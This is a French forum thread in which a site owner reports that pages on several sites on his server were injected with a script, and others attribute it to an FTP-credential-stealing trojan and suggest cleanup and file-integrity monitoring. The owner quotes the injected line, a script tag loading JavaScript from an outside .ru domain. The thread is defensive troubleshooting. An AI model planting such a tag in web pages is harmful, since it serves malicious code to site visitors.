site hacké ou virus sur serveur kimsufi?

[bangdai]

bonjour,

j'ai plusieurs sites hébergés sur le meme serveur kimsufi gentoo et hier j'ai constaté qu'un des sites a été hacké.
Plus exactement, sur certaines pages, un script a été ajouté en fin de fichier afin d'exécuter un script externe.

Le code ressemble à ça:

<script type="text/javascript" src="http://obscurewax.ru/FAQ.js"></script>
<!--72628eb2e686638651ad69b6a34a630f-->

Et je viens de me rendre compte qu'il ne s'agit pas que d'un seul site, mais plusieurs autres qui sont sur le meme serveur.
Je demande de l'aide, si qqn peut m'aider.
J'ai déja modifié les pages infectés et changer les chmod en 404 et 505 (dossier).

Je me demande si c'est juste un piratage ou est ce que mon serveur a un virus qui traine. Que faire?
Merci

[Zecat]

Un classique trojan qui passe probablement par ton client ftp (filezila ?).

Une fois qu'il a chopé le smots de passe de tes accès ftp, il va infecter tous les sites. Donc :

1 - chnagement de tous les password
2 - Nettoyage des sites sur les serveurs (surveiller tous les fichier "index" et tous les fichier ".js")

[bangdai]

merci Zecat,
donc ce n'est pas un piratage. ça serait simplement un trojan qui a exploité filezila (et oui je suis bien sur filezila) et qui s'est amusé à modifier mes pages.
Meme si je nettoie les sites sur le serveurs, il faudrait nettoyer à la source. Donc éliminer mon trojan sur la machine.
Comment faire pour etre sur que je puisse utiliser filezila sans risque et sans qu'il aille faire des degats?

[Zecat]

J'ai été confronté à la bête et dans l'ordre j'ai fait :

1 - mise a jour anti virus sur ma machine et scan complet fin ...
2 - modification de tous mes pass ftp via l'admin de mes hebergeurs
3 - verif par securite que plus rien ne traine en local sur les pages de mes sites
4 - nettoyage un a un des sites par re upload des pages (maintenant que filezila est secure)
5 - Demande de reexamen des site spar google pour fiare disparaitre l'alerte
6 - En option je me suis mis en place une detection temps réel (cron une fois par minute) de l'arrivée à nouveau du trojan (on sait jamais) : ca detecte un changement de taille/date sur certains fichiers, ca les fous de coté, ce remet en temps réel des fichiers sains à la place, ca m'envoie un mail d'alerte sur 2 emails différents.

Pas la panacée mais au moins je dors plus tranquille et ca peut eviter un dérangement des visiteurs et qu'un bot tombe dessus (ca fait toujours désordre).

[bangdai]

ok, bien saisi,
en resumé, nettoyer le trojan sur la machine, changer les pass FTP et nettoyer le serveur.
concerant le script que tu as crée, cest possible de me le passer? Enfin, je ferai les modif qu'il faut pour l'adapter a mon cas.
Je trouve que c'est une bonne methode pour garder le site sain, et ça evite detre hacké.
Enfait, comment tu fais pour remettre les fichiers sains a la place, si l'ancien ficher est deja corrompu?
encore merci

[ricosound]

En fait, comment tu fais pour remettre les fichiers sains a la place, si l'ancien ficher est deja corrompu?

Facile, tu gardes une copie de sécurité dans un autre répertoire et sous un autre nom.

Et à chaque fois que tu en as besoin tu recopies au bon endroit en renommant les fichiers correctement.

Ça fonctionne aussi à la main si tu as gardé une copie du site, mais la méthode du grrrominet est bien plus rapide et efficace.

Cordialement, Éric.

[Zecat]

En fait, comment tu fais pour remettre les fichiers sains a la place, si l'ancien ficher est deja corrompu?

Facile, tu gardes une copie de sécurité dans un autre répertoire et sous un autre nom.

Et à chaque fois que tu en as besoin tu recopies au bon endroit en renommant les fichiers correctement.

Ça fonctionne aussi à la main si tu as gardé une copie du site, mais la méthode du grrrominet est bien plus rapide et efficace.

Cordialement, Éric.

Toutafé toutafé ... et surtout reposante !

non sans avoir prealablement mis de coté les fichiers verolés pour analyse ultérieure (perso je les reecris simplement avec un timestamp dans le nom, comme ca meme si le trojan insiste, je garde tout). Bon pour le script je prefère pas because y a des trucs "en plus" pour tromper "l'ennemi" que je souhaite garder pour mezigue. Mais bon tu as tout le mode d'emploi, c'ets pas bien dur à coder.

[bangdai]

tres bien,
merci pour ton aide. je vais de ce pas régler le souci.